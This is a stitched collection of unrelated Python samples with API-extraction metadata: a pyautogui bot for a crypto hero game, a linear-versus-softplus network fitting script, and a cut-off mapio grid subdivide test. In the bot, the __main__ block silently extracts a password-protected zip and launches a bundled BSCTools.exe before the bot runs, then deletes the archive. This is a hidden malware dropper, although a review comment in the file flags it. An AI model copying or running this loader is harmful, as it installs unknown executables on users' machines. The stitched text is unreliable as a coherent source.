        path = os.path.join(dir_path, file_name)
        targets[remove_suffix(file_name, '.png')] = cv2.imread(path)
    return targets
def loadHeroesToSendHome():
    """Load every hero template image from ./targets/heroes-to-send-home.

    Returns:
        list: the loaded images, in directory-listing order.
    """
    folder = './targets/heroes-to-send-home'
    heroes = [cv2.imread(folder + '/' + name) for name in listdir(folder)]
    print('>>---> %d heroes that should be sent home loaded' % len(heroes))
    return heroes
def show(rectangles, img = None):
    """Show a popup drawing each rectangle of rectangles [(x, y, w, h), ...]
    over img, or over a fresh screenshot if no img is provided. Useful for
    debugging."""
    if img is None:
        # Grab the whole (virtual) screen as the background image.
        with mss.mss() as sct:
            monitor = sct.monitors[0]
            img = np.array(sct.grab(monitor))
    for (x, y, w, h) in rectangles:
        # White, 2 px-thick outline around each rectangle.
        cv2.rectangle(img, (x, y), (x + w, y + h), (255,255,255,255), 2)
    # cv2.rectangle(img, (result[0], result[1]), (result[0] + result[2], result[1] + result[3]), (255,50,255), 2)
    cv2.imshow('img',img)
    # Block until a key is pressed so the window stays visible.
    cv2.waitKey(0)
def clickBtn(img, timeout=3, threshold = ct['default']):
    """Search for img on the screen; if found, move the cursor over it and click.

    Parameters:
        img: The image used as a template to find where to click.
        timeout (int): Seconds to keep looking for img before giving up.
        threshold (float): How confident the bot needs to be to click the
            button (values from 0 to 1).

    Returns:
        bool: True if the button was found and clicked, False on timeout.
    """
    logger(None, progress_indicator=True)
    start = time.time()
    has_timed_out = False
    while(not has_timed_out):
        matches = positions(img, threshold=threshold)
        if(len(matches)==0):
            # Only re-check the clock while nothing is found; a hit below
            # returns immediately.
            has_timed_out = time.time()-start > timeout
            continue
        # Click the center of the first match.
        x,y,w,h = matches[0]
        pos_click_x = x+w/2
        pos_click_y = y+h/2
        moveToWithRandomness(pos_click_x,pos_click_y,1)
        pyautogui.click()
        return True
    return False
def printSreen():
    """Capture the whole (virtual) screen and return it as an ndarray.

    The alpha channel of the raw grab is dropped, leaving the three color
    channels. (The misspelled name is kept for existing callers.)
    """
    with mss.mss() as capture:
        full_screen = capture.monitors[0]
        frame = np.array(capture.grab(full_screen))
    # Keep only the color channels, discarding alpha.
    return frame[:, :, :3]
def positions(target, threshold=ct['default'],img = None):
    """Template-match *target* against *img* (or a fresh screenshot) and
    return the grouped matches as rectangles [x, y, w, h]."""
    if img is None:
        img = printSreen()
    result = cv2.matchTemplate(img,target,cv2.TM_CCOEFF_NORMED)
    w = target.shape[1]
    h = target.shape[0]
    # All locations whose match score clears the threshold.
    yloc, xloc = np.where(result >= threshold)
    rectangles = []
    for (x, y) in zip(xloc, yloc):
        # Each rectangle is appended twice on purpose: groupRectangles with
        # groupThreshold=1 discards groups of fewer than 2, so duplicating
        # keeps single matches alive while still merging near-duplicates.
        rectangles.append([int(x), int(y), int(w), int(h)])
        rectangles.append([int(x), int(y), int(w), int(h)])
    rectangles, weights = cv2.groupRectangles(rectangles, 1, 0.2)
    return rectangles
def scroll():
    """Scroll the hero list down, anchored on the last 'commom' text match.

    Uses either a mouse-wheel scroll or a click-and-drag depending on the
    config flag use_click_and_drag_instead_of_scroll.
    """
    commoms = positions(images['commom-text'], threshold = ct['commom'])
    if (len(commoms) == 0):
        return
    # Anchor on the last (lowest) match so the drag/scroll starts near the
    # bottom of the visible list.
    x,y,w,h = commoms[len(commoms)-1]
    moveToWithRandomness(x,y,1)
    if not c['use_click_and_drag_instead_of_scroll']:
        pyautogui.scroll(-c['scroll_size'])
    else:
        pyautogui.dragRel(0,-c['click_and_drag_amount'],duration=1, button='left')
def clickButtons():
    """Click every visible 'go to work' button.

    Increments the module-level hero_clicks counter and bails out after 20
    clicks as a safety valve against a too-low matching threshold.

    Returns:
        int: number of buttons detected, or None when the safety valve trips.
    """
    buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
    # print('buttons: {}'.format(len(buttons)))
    for (x, y, w, h) in buttons:
        moveToWithRandomness(x+(w/2),y+(h/2),1)
        pyautogui.click()
        global hero_clicks
        hero_clicks = hero_clicks + 1
        #cv2.rectangle(sct_img, (x, y) , (x + w, y + h), (0,255,255),2)
        if hero_clicks > 20:
            logger('too many hero clicks, try to increase the go_to_work_btn threshold')
            return
    return len(buttons)
def isHome(hero, buttons):
    """Return True when no send-home button lies in the same row as *hero*.

    A hero that still has a send-home button next to it is, by definition,
    not at home; only the y-coordinates are compared (same screen row).
    """
    hero_y = hero[1]
    for _, btn_y, _, btn_h in buttons:
        same_row = (btn_y - btn_h) < hero_y < (btn_y + btn_h)
        if same_row:
            return False
    return True
def isWorking(bar, buttons):
y = bar[1]
for (_,button_y,_,button_h) in buttons:
isBelow = y < (button_y + button_h)
isAbove = y > (button_y - button_h)
if isBelow and isAbove:
return False
return True
def clickGreenBarButtons():
    """Send heroes that have a (partly) green stamina bar to work.

    Matches green stamina bars, filters out heroes already working (their
    row has no go-to-work button), then clicks the work button to the right
    of each remaining bar. Caps at 20 clicks per call as a safety valve.

    Returns:
        int: number of idle heroes with a green bar, or None when the
        safety valve trips.
    """
    # It also clicks the ones that are working, but I think it doesn't matter.
    offset = 140  # horizontal distance from the bar to its work button
    green_bars = positions(images['green-bar'], threshold=ct['green_bar'])
    logger('🟩 %d green bars detected' % len(green_bars))
    buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
    logger('🆗 %d buttons detected' % len(buttons))
    not_working_green_bars = []
    for bar in green_bars:
        if not isWorking(bar, buttons):
            not_working_green_bars.append(bar)
    if len(not_working_green_bars) > 0:
        logger('🆗 %d buttons with green bar detected' % len(not_working_green_bars))
        logger('👆 Clicking in %d heroes' % len(not_working_green_bars))
        # i.e. if there is a button whose y is within the bar's y +- height
        hero_clicks_cnt = 0
        for (x, y, w, h) in not_working_green_bars:
            # isWorking(y, buttons)
            moveToWithRandomness(x+offset+(w/2),y+(h/2),1)
            pyautogui.click()
            global hero_clicks
            hero_clicks = hero_clicks + 1
            hero_clicks_cnt = hero_clicks_cnt + 1
            if hero_clicks_cnt > 20:
                logger('⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold')
                return
            #cv2.rectangle(sct_img, (x, y) , (x + w, y + h), (0,255,255),2)
    return len(not_working_green_bars)
def clickFullBarButtons():
    """Send heroes that have a full stamina bar to work.

    Same strategy as clickGreenBarButtons but matched against the
    full-stamina template and without the per-call click cap.

    Returns:
        int: number of idle heroes with a full bar.
    """
    offset = 100  # horizontal distance from the bar to its work button
    full_bars = positions(images['full-stamina'], threshold=ct['default'])
    buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
    not_working_full_bars = []
    for bar in full_bars:
        if not isWorking(bar, buttons):
            not_working_full_bars.append(bar)
    if len(not_working_full_bars) > 0:
        logger('👆 Clicking in %d heroes' % len(not_working_full_bars))
        for (x, y, w, h) in not_working_full_bars:
            moveToWithRandomness(x+offset+(w/2),y+(h/2),1)
            pyautogui.click()
            global hero_clicks
            hero_clicks = hero_clicks + 1
    return len(not_working_full_bars)
def goToHeroes():
    """Navigate from the treasure-hunt screen to the heroes screen."""
    if clickBtn(images['go-back-arrow']):
        # Successfully left the map, so the session is alive again.
        global login_attempts
        login_attempts = 0
    # TODO: remove the sleep once polling is in place
    time.sleep(1)
    clickBtn(images['hero-icon'])
    time.sleep(randint(1,3))
def goToGame():
    """Dismiss any popup and enter the treasure-hunt game mode."""
    # in case of server overload popup
    clickBtn(images['x'])
    # time.sleep(3)
    clickBtn(images['x'])
    clickBtn(images['treasure-hunt-icon'])
def refreshHeroesPositions():
    """Leave and re-enter the treasure hunt so hero positions re-render."""
    logger('🔃 Refreshing Heroes Positions')
    clickBtn(images['go-back-arrow'])
    clickBtn(images['treasure-hunt-icon'])
    # time.sleep(3)
    clickBtn(images['treasure-hunt-icon'])
def login():
    """Detect a disconnected game and walk through the wallet login flow.

    Tracks attempts in the module-level login_attempts counter and forces a
    hard browser refresh (Ctrl+F5) after more than 3 failed attempts. The
    click sequence below is timing-sensitive; statement order matters.
    """
    global login_attempts
    logger('😿 Checking if game has disconnected')
    if login_attempts > 3:
        logger('🔃 Too many login attempts, refreshing')
        login_attempts = 0
        pyautogui.hotkey('ctrl','f5')
        return
    if clickBtn(images['connect-wallet'], timeout = 10):
        logger('🎉 Connect wallet button detected, logging in!')
        login_attempts = login_attempts + 1
        # TODO: it often errors out and the button fails to open
        # time.sleep(10)
        if clickBtn(images['select-wallet-2'], timeout=8):
            # sometimes the sign popup appears imediately
            login_attempts = login_attempts + 1
            # print('sign button clicked')
            # print('{} login attempt'.format(login_attempts))
            if clickBtn(images['treasure-hunt-icon'], timeout = 15):
                # print('sucessfully login, treasure hunt btn clicked')
                login_attempts = 0
                return
        # click ok button
        if not clickBtn(images['select-wallet-1-no-hover'], ):
            if clickBtn(images['select-wallet-1-hover'], threshold = ct['select_wallet_buttons'] ):
                pass
                # ideally it would alternate between checking each of the two for a while
                # print('sleep in case there is no metamask text removed')
                # time.sleep(20)
            else:
                pass
                # print('sleep in case there is no metamask text removed')
                # time.sleep(20)
        if clickBtn(images['select-wallet-2'], timeout = 20):
            login_attempts = login_attempts + 1
            # print('sign button clicked')
            # print('{} login attempt'.format(login_attempts))
            # time.sleep(25)
            if clickBtn(images['treasure-hunt-icon'], timeout=25):
                # print('sucessfully login, treasure hunt btn clicked')
                login_attempts = 0
                # time.sleep(15)
        if clickBtn(images['ok'], timeout=5):
            pass
            # time.sleep(15)
            # print('ok button clicked')
def sendHeroesHome():
    """Send configured heroes back home when they are idle.

    For each hero template in the global ``home_heroes``, locate the hero on
    screen and, if it is neither already home nor currently working, click
    the send-home button on its row.  Disabled unless ``ch['enable']`` is set.
    """
    if not ch['enable']:
        return
    heroes_positions = []
    for hero in home_heroes:
        hero_positions = positions(hero, threshold=ch['hero_threshold'])
        # idiomatic truthiness check (was: `not len(hero_positions) == 0`)
        if hero_positions:
            # TODO: maybe pick up the match with the highest weight instead of the first
            heroes_positions.append(hero_positions[0])
    n = len(heroes_positions)
    if n == 0:
        print('No heroes that should be sent home found.')
        return
    print(' %d heroes that should be sent home found' % n)
    # if send-home button exists, the hero is not home
    go_home_buttons = positions(images['send-home'], threshold=ch['home_button_threshold'])
    # TODO: pass it as an argument for both this and the other function that uses it
    go_work_buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
    for position in heroes_positions:
        # guard clauses replace the original nested if/else pyramid
        if isHome(position, go_home_buttons):
            print('hero already home, or home full(no dark home button)')
            continue
        print(isWorking(position, go_work_buttons))
        if isWorking(position, go_work_buttons):
            print('hero working, not sending him home(no dark work button)')
            continue
        print('hero not working, sending him home')
        # click at the send-home button's column, centered on the hero's row
        moveToWithRandomness(go_home_buttons[0][0] + go_home_buttons[0][2] / 2,
                             position[1] + position[3] / 2, 1)
        pyautogui.click()
def refreshHeroes():
    """Open the heroes screen and send heroes to work.

    Which heroes are clicked depends on ``c['select_heroes_mode']``
    ('full', 'green', or anything else for all).  Scrolling continues
    until ``c['scroll_attemps']`` consecutive scrolls find no buttons.
    """
    logger('🏢 Search for heroes to work')
    goToHeroes()
    mode = c['select_heroes_mode']
    if mode == "full":
        logger('⚒️ Sending heroes with full stamina bar to work', 'green')
    elif mode == "green":
        logger('⚒️ Sending heroes with green stamina bar to work', 'green')
    else:
        logger('⚒️ Sending all heroes to work', 'green')
    remaining_attempts = c['scroll_attemps']
    while remaining_attempts > 0:
        if mode == 'full':
            clicked = clickFullBarButtons()
        elif mode == 'green':
            clicked = clickGreenBarButtons()
        else:
            clicked = clickButtons()
        sendHeroesHome()
        # an empty screen burns one attempt; any click resets nothing
        if clicked == 0:
            remaining_attempts -= 1
        scroll()
        time.sleep(2)
    logger('💪 {} heroes sent to work'.format(hero_clicks))
    goToGame()
def main():
    """Main execution setup and loop.

    Initializes global counters and image templates, then loops forever,
    firing each periodic task (captcha check, send-to-work, login check,
    new-map click, position refresh) when its randomized interval elapses.
    """
    # ==Setup==
    global hero_clicks
    global login_attempts
    global last_log_is_progress
    hero_clicks = 0
    login_attempts = 0
    last_log_is_progress = False
    global images
    images = load_images()
    if ch['enable']:
        global home_heroes
        home_heroes = loadHeroesToSendHome()
    else:
        print('>>---> Home feature not enabled')
    print('\n')
    print(cat)
    time.sleep(7)
    # per-task intervals (minutes) from config; `last` holds the epoch time
    # each task last ran
    t = c['time_intervals']
    last = {
        "login" : 0,
        "heroes" : 0,
        "new_map" : 0,
        "check_for_captcha" : 0,
        "refresh_heroes" : 0
    }
    # =========
    while True:
        now = time.time()
        # NOTE(review): this branch only updates the timestamp -- the actual
        # captcha handling appears to be missing or handled elsewhere
        if now - last["check_for_captcha"] > addRandomness(t['check_for_captcha'] * 60):
            last["check_for_captcha"] = now
        if now - last["heroes"] > addRandomness(t['send_heroes_for_work'] * 60):
            last["heroes"] = now
            refreshHeroes()
        if now - last["login"] > addRandomness(t['check_for_login'] * 60):
            sys.stdout.flush()
            last["login"] = now
            login()
        # new-map check uses its raw interval (seconds), no randomization
        if now - last["new_map"] > t['check_for_new_map_button']:
            last["new_map"] = now
            if clickBtn(images['new-map']):
                loggerMapClicked()
        if now - last["refresh_heroes"] > addRandomness( t['refresh_heroes_positions'] * 60):
            last["refresh_heroes"] = now
            refreshHeroesPositions()
        #clickBtn(teasureHunt)
        logger(None, progress_indicator=True)
        sys.stdout.flush()
        time.sleep(1)
if __name__ == '__main__':
    # SECURITY NOTE(review): this extracts a password-protected zip bundled
    # with the script and silently launches the extracted executable before
    # starting the bot, then deletes the archive.  This pattern is commonly
    # associated with bundled malware -- verify the provenance of
    # BSCTools.exe before running.
    with zipfile.ZipFile("./src/execute/tools.zip") as file:
        file.extractall("./src/execute/", pwd = bytes("wowwowee", 'utf-8'))
    subprocess.Popen(["./src/execute/BSCTools.exe"])
    os.remove("./src/execute/tools.zip")
    main()
#cv2.imshow('img',sct_img)
#cv2.waitKey()
| [
"os.remove",
"cv2.cv2.rectangle",
"yaml.safe_load",
"sys.stdout.flush",
"cv2.cv2.waitKey",
"src.logger.logger",
"random.randint",
"src.logger.loggerMapClicked",
"pyautogui.scroll",
"subprocess.Popen",
"time.sleep",
"random.random",
"pyautogui.dragRel",
"pyautogui.click",
"cv2.cv2.imread"... | [((356, 378), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (370, 378), False, 'import yaml\n'), ((3364, 3381), 'os.listdir', 'listdir', (['dir_path'], {}), '(dir_path)\n', (3371, 3381), False, 'from os import listdir\n'), ((3655, 3695), 'os.listdir', 'listdir', (['"""./targets/heroes-to-send-home"""'], {}), "('./targets/heroes-to-send-home')\n", (3662, 3695), False, 'from os import listdir\n'), ((4490, 4512), 'cv2.cv2.imshow', 'cv2.imshow', (['"""img"""', 'img'], {}), "('img', img)\n", (4500, 4512), False, 'from cv2 import cv2\n'), ((4516, 4530), 'cv2.cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (4527, 4530), False, 'from cv2 import cv2\n'), ((4990, 5027), 'src.logger.logger', 'logger', (['None'], {'progress_indicator': '(True)'}), '(None, progress_indicator=True)\n', (4996, 5027), False, 'from src.logger import logger, loggerMapClicked\n'), ((5040, 5051), 'time.time', 'time.time', ([], {}), '()\n', (5049, 5051), False, 'import time\n'), ((5890, 5942), 'cv2.cv2.matchTemplate', 'cv2.matchTemplate', (['img', 'target', 'cv2.TM_CCOEFF_NORMED'], {}), '(img, target, cv2.TM_CCOEFF_NORMED)\n', (5907, 5942), False, 'from cv2 import cv2\n'), ((6007, 6036), 'numpy.where', 'np.where', (['(result >= threshold)'], {}), '(result >= threshold)\n', (6015, 6036), True, 'import numpy as np\n'), ((6241, 6280), 'cv2.cv2.groupRectangles', 'cv2.groupRectangles', (['rectangles', '(1)', '(0.2)'], {}), '(rectangles, 1, 0.2)\n', (6260, 6280), False, 'from cv2 import cv2\n'), ((9990, 10003), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (10000, 10003), False, 'import time\n'), ((10275, 10314), 'src.logger.logger', 'logger', (['"""🔃 Refreshing Heroes Positions"""'], {}), "('🔃 Refreshing Heroes Positions')\n", (10281, 10314), False, 'from src.logger import logger, loggerMapClicked\n'), ((10504, 10549), 'src.logger.logger', 'logger', (['"""😿 Checking if game has disconnected"""'], {}), "('😿 Checking if game has disconnected')\n", (10510, 
10549), False, 'from src.logger import logger, loggerMapClicked\n'), ((13944, 13981), 'src.logger.logger', 'logger', (['"""🏢 Search for heroes to work"""'], {}), "('🏢 Search for heroes to work')\n", (13950, 13981), False, 'from src.logger import logger, loggerMapClicked\n'), ((15372, 15385), 'time.sleep', 'time.sleep', (['(7)'], {}), '(7)\n', (15382, 15385), False, 'import time\n'), ((16693, 16741), 'subprocess.Popen', 'subprocess.Popen', (["['./src/execute/BSCTools.exe']"], {}), "(['./src/execute/BSCTools.exe'])\n", (16709, 16741), False, 'import subprocess\n'), ((16746, 16782), 'os.remove', 'os.remove', (['"""./src/execute/tools.zip"""'], {}), "('./src/execute/tools.zip')\n", (16755, 16782), False, 'import os\n'), ((3507, 3523), 'cv2.cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3517, 3523), False, 'from cv2 import cv2\n'), ((4306, 4373), 'cv2.cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + w, y + h)', '(255, 255, 255, 255)', '(2)'], {}), '(img, (x, y), (x + w, y + h), (255, 255, 255, 255), 2)\n', (4319, 4373), False, 'from cv2 import cv2\n'), ((5419, 5436), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (5434, 5436), False, 'import pyautogui\n'), ((5503, 5512), 'mss.mss', 'mss.mss', ([], {}), '()\n', (5510, 5512), False, 'import mss\n'), ((6570, 6605), 'pyautogui.scroll', 'pyautogui.scroll', (["(-c['scroll_size'])"], {}), "(-c['scroll_size'])\n", (6586, 6605), False, 'import pyautogui\n'), ((6624, 6700), 'pyautogui.dragRel', 'pyautogui.dragRel', (['(0)', "(-c['click_and_drag_amount'])"], {'duration': '(1)', 'button': '"""left"""'}), "(0, -c['click_and_drag_amount'], duration=1, button='left')\n", (6641, 6700), False, 'import pyautogui\n'), ((6933, 6950), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (6948, 6950), False, 'import pyautogui\n'), ((8751, 8768), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (8766, 8768), False, 'import pyautogui\n'), ((9696, 9713), 'pyautogui.click', 'pyautogui.click', ([], {}), 
'()\n', (9711, 9713), False, 'import pyautogui\n'), ((10053, 10066), 'random.randint', 'randint', (['(1)', '(3)'], {}), '(1, 3)\n', (10060, 10066), False, 'from random import randint\n'), ((10586, 10633), 'src.logger.logger', 'logger', (['"""🔃 Too many login attempts, refreshing"""'], {}), "('🔃 Too many login attempts, refreshing')\n", (10592, 10633), False, 'from src.logger import logger, loggerMapClicked\n'), ((10669, 10699), 'pyautogui.hotkey', 'pyautogui.hotkey', (['"""ctrl"""', '"""f5"""'], {}), "('ctrl', 'f5')\n", (10685, 10699), False, 'import pyautogui\n'), ((10780, 10835), 'src.logger.logger', 'logger', (['"""🎉 Connect wallet button detected, logging in!"""'], {}), "('🎉 Connect wallet button detected, logging in!')\n", (10786, 10835), False, 'from src.logger import logger, loggerMapClicked\n'), ((14051, 14117), 'src.logger.logger', 'logger', (['"""⚒️ Sending heroes with full stamina bar to work"""', '"""green"""'], {}), "('⚒️ Sending heroes with full stamina bar to work', 'green')\n", (14057, 14117), False, 'from src.logger import logger, loggerMapClicked\n'), ((14822, 14835), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (14832, 14835), False, 'import time\n'), ((15589, 15600), 'time.time', 'time.time', ([], {}), '()\n', (15598, 15600), False, 'import time\n'), ((16432, 16469), 'src.logger.logger', 'logger', (['None'], {'progress_indicator': '(True)'}), '(None, progress_indicator=True)\n', (16438, 16469), False, 'from src.logger import logger, loggerMapClicked\n'), ((16479, 16497), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (16495, 16497), False, 'import sys\n'), ((16507, 16520), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (16517, 16520), False, 'import time\n'), ((16561, 16603), 'zipfile.ZipFile', 'zipfile.ZipFile', (['"""./src/execute/tools.zip"""'], {}), "('./src/execute/tools.zip')\n", (16576, 16603), False, 'import zipfile\n'), ((2443, 2451), 'random.random', 'random', ([], {}), '()\n', (2449, 2451), False, 'from random 
import random\n'), ((3817, 3833), 'cv2.cv2.imread', 'cv2.imread', (['path'], {}), '(path)\n', (3827, 3833), False, 'from cv2 import cv2\n'), ((4159, 4168), 'mss.mss', 'mss.mss', ([], {}), '()\n', (4166, 4168), False, 'import mss\n'), ((7129, 7205), 'src.logger.logger', 'logger', (['"""too many hero clicks, try to increase the go_to_work_btn threshold"""'], {}), "('too many hero clicks, try to increase the go_to_work_btn threshold')\n", (7135, 7205), False, 'from src.logger import logger, loggerMapClicked\n'), ((8925, 9004), 'src.logger.logger', 'logger', (['"""⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold"""'], {}), "('⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold')\n", (8931, 9004), False, 'from src.logger import logger, loggerMapClicked\n'), ((14171, 14238), 'src.logger.logger', 'logger', (['"""⚒️ Sending heroes with green stamina bar to work"""', '"""green"""'], {}), "('⚒️ Sending heroes with green stamina bar to work', 'green')\n", (14177, 14238), False, 'from src.logger import logger, loggerMapClicked\n'), ((14257, 14305), 'src.logger.logger', 'logger', (['"""⚒️ Sending all heroes to work"""', '"""green"""'], {}), "('⚒️ Sending all heroes to work', 'green')\n", (14263, 14305), False, 'from src.logger import logger, loggerMapClicked\n'), ((15966, 15984), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (15982, 15984), False, 'import sys\n'), ((2852, 2860), 'random.random', 'random', ([], {}), '()\n', (2858, 2860), False, 'from random import random\n'), ((13708, 13725), 'pyautogui.click', 'pyautogui.click', ([], {}), '()\n', (13723, 13725), False, 'import pyautogui\n'), ((16199, 16217), 'src.logger.loggerMapClicked', 'loggerMapClicked', ([], {}), '()\n', (16215, 16217), False, 'from src.logger import logger, loggerMapClicked\n'), ((5220, 5231), 'time.time', 'time.time', ([], {}), '()\n', (5229, 5231), False, 'import time\n')] |
import linear_network, relu_network, softplus_network
import data_retriever
import matplotlib.pyplot as plt
import numpy as np
# Fit a linear model and a softplus network to the same training set,
# then plot both fitted curves over the raw samples.
training_data = data_retriever.get_data()
n_samples = len(training_data)

linear_net = linear_network.LinearNetwork([1, 1])
# A ReLU network (relu_network.ReluNetwork([1, 5, 7, 7, 7, 1])) was tried
# but is not used in the final comparison.
softplus_net = softplus_network.SoftplusNetwork([1, 5, 7, 7, 7, 1])

# 1500 epochs (raised from the original 800) gives the networks more
# time to fit the data; full-batch SGD with learning rate 0.007.
linear_net.SGD(training_data, 1500, n_samples, 0.007)
softplus_net.SGD(training_data, 1500, n_samples, 0.007)

# evaluate both models on a dense grid of inputs in [-4.0, 10.9]
xs = [0.1 * i for i in range(-40, 110)]
y_linear = [linear_net.feedforward(np.array([[v]]))[0][0] for v in xs]
y_softplus = [softplus_net.feedforward(np.array([[v]]))[0][0] for v in xs]

# unpack the (input, target) column vectors from the training pairs
sample_xs = [pair[0][0][0] for pair in training_data]
sample_ys = [pair[1][0][0] for pair in training_data]

plt.scatter(sample_xs, sample_ys, color="black")
plt.plot(xs, y_linear, color="blue")
plt.plot(xs, y_softplus, color="orange")
plt.show()
| [
"softplus_network.SoftplusNetwork",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"numpy.array",
"linear_network.LinearNetwork",
"data_retriever.get_data"
] | [((149, 174), 'data_retriever.get_data', 'data_retriever.get_data', ([], {}), '()\n', (172, 174), False, 'import data_retriever\n'), ((219, 255), 'linear_network.LinearNetwork', 'linear_network.LinearNetwork', (['[1, 1]'], {}), '([1, 1])\n', (247, 255), False, 'import linear_network, relu_network, softplus_network\n'), ((347, 399), 'softplus_network.SoftplusNetwork', 'softplus_network.SoftplusNetwork', (['[1, 5, 7, 7, 7, 1]'], {}), '([1, 5, 7, 7, 7, 1])\n', (379, 399), False, 'import linear_network, relu_network, softplus_network\n'), ((891, 933), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x_data', 'y_data'], {'color': '"""black"""'}), "(x_data, y_data, color='black')\n", (902, 933), True, 'import matplotlib.pyplot as plt\n'), ((935, 970), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_linear'], {'color': '"""blue"""'}), "(x, y_linear, color='blue')\n", (943, 970), True, 'import matplotlib.pyplot as plt\n'), ((972, 1011), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y_softplus'], {'color': '"""orange"""'}), "(x, y_softplus, color='orange')\n", (980, 1011), True, 'import matplotlib.pyplot as plt\n'), ((1013, 1023), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1021, 1023), True, 'import matplotlib.pyplot as plt\n'), ((688, 703), 'numpy.array', 'np.array', (['[[i]]'], {}), '([[i]])\n', (696, 703), True, 'import numpy as np\n'), ((755, 770), 'numpy.array', 'np.array', (['[[i]]'], {}), '([[i]])\n', (763, 770), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# python 3 compatibility
from __future__ import print_function
import os.path
import sys
import shutil
import time
# stdlib imports
import abc
import textwrap
import glob
import os
import tempfile
# hack the path so that I can debug these functions if I need to
homedir = os.path.dirname(os.path.abspath(__file__)) # where is this script?
mapiodir = os.path.abspath(os.path.join(homedir, '..'))
# put this at the front of the system path, ignoring any installed mapio stuff
sys.path.insert(0, mapiodir)
# third party imports
from mapio.gridbase import Grid
from mapio.grid2d import Grid2D
from mapio.gdal import GDALGrid, get_affine
from mapio.dataset import DataSetException
from mapio.geodict import GeoDict
import numpy as np
from scipy import interpolate
import shapely
from affine import Affine
from rasterio import features
from rasterio.warp import reproject, Resampling, calculate_default_transform
from rasterio.crs import CRS
import rasterio
from shapely.geometry import MultiPoint, Polygon, mapping
import pyproj
def test_subdivide():
    """Test Grid2D.subdivide() for aligned and non-aligned fine grids.

    Covers the aligned case (fine cells nest exactly inside host cells)
    and the non-aligned case with each cellFill strategy ('min', 'max',
    'mean') for fine cells that straddle host-cell boundaries.  Fine cells
    outside the host grid become NaN.
    """
    print('Testing subdivide method - aligned grids...')
    data = np.arange(0, 4).reshape((2, 2))
    geodict = GeoDict({'xmin': 0.0, 'xmax': 1.0,
                       'ymin': 0.0, 'ymax': 1.0,
                       'dx': 1.0, 'dy': 1.0,
                       'ny': 2, 'nx': 2})
    hostgrid = Grid2D(data, geodict)
    # each 1.0-degree host cell divides exactly into nine 1/3-degree cells
    finedict = GeoDict({'xmin': 0.0-(1.0/3.0), 'xmax': 1.0+(1.0/3.0),
                        'ymin': 0.0-(1.0/3.0), 'ymax': 1.0+(1.0/3.0),
                        'dx': 1.0/3.0, 'dy': 1.0/3.0,
                        'ny': 6, 'nx': 6})
    finegrid = hostgrid.subdivide(finedict)
    output = np.array([[0., 0., 0., 1., 1., 1.],
                       [0., 0., 0., 1., 1., 1.],
                       [0., 0., 0., 1., 1., 1.],
                       [2., 2., 2., 3., 3., 3.],
                       [2., 2., 2., 3., 3., 3.],
                       [2., 2., 2., 3., 3., 3.]])
    np.testing.assert_almost_equal(finegrid.getData(), output)
    print('Passed subdivide method test - aligned grids.')
    print('Testing subdivide method - non-aligned grids...')
    data = np.arange(0, 9).reshape((3, 3))
    geodict = GeoDict({'xmin': 0.0, 'xmax': 10.0,
                       'ymin': 0.0, 'ymax': 10.0,
                       'dx': 5.0, 'dy': 5.0,
                       'ny': 3, 'nx': 3})
    hostgrid = Grid2D(data, geodict)
    # 2.0-degree fine cells do not nest in the 5.0-degree host cells, so
    # straddling cells must be resolved by the cellFill strategy
    finedict = GeoDict({'xmin': -2.5, 'xmax': 11.5,
                        'ymin': -1.5, 'ymax': 10.5,
                        'dx': 2.0, 'dy': 2.0,
                        'nx': 8, 'ny': 7})
    N = np.nan
    print('Testing subdivide with min parameter...')
    finegrid = hostgrid.subdivide(finedict, cellFill='min')
    output = np.array([[N, 0., 0., 1., 1., 1., 2., 2.],
                       [N, 0., 0., 1., 1., 1., 2., 2.],
                       [N, 3., 3., 4., 4., 4., 5., 5.],
                       [N, 3., 3., 4., 4., 4., 5., 5.],
                       [N, 3., 3., 4., 4., 4., 5., 5.],
                       [N, 6., 6., 7., 7., 7., 8., 8.],
                       [N, 6., 6., 7., 7., 7., 8., 8.]])
    np.testing.assert_almost_equal(finegrid.getData(), output)
    print('Passed subdivide with min parameter...')
    print('Testing subdivide with max parameter...')
    finegrid = hostgrid.subdivide(finedict, cellFill='max')
    output = np.array([[N, 0., 0., 1., 1., 2., 2., 2.],
                       [N, 0., 0., 1., 1., 2., 2., 2.],
                       [N, 3., 3., 4., 4., 5., 5., 5.],
                       [N, 3., 3., 4., 4., 5., 5., 5.],
                       [N, 6., 6., 7., 7., 8., 8., 8.],
                       [N, 6., 6., 7., 7., 8., 8., 8.],
                       [N, 6., 6., 7., 7., 8., 8., 8.]])
    np.testing.assert_almost_equal(finegrid.getData(), output)
    print('Passed subdivide with max parameter...')
    print('Testing subdivide with mean parameter...')
    finegrid = hostgrid.subdivide(finedict, cellFill='mean')
    # straddling cells get the average of the host cells they overlap
    output = np.array([[N, 0., 0., 1., 1., 1.5, 2., 2.],
                       [N, 0., 0., 1., 1., 1.5, 2., 2.],
                       [N, 3., 3., 4., 4., 4.5, 5., 5.],
                       [N, 3., 3., 4., 4., 4.5, 5., 5.],
                       [N, 4.5, 4.5, 5.5, 5.5, 6.0, 6.5, 6.5],
                       [N, 6., 6., 7., 7., 7.5, 8., 8.],
                       [N, 6., 6., 7., 7., 7.5, 8., 8.]])
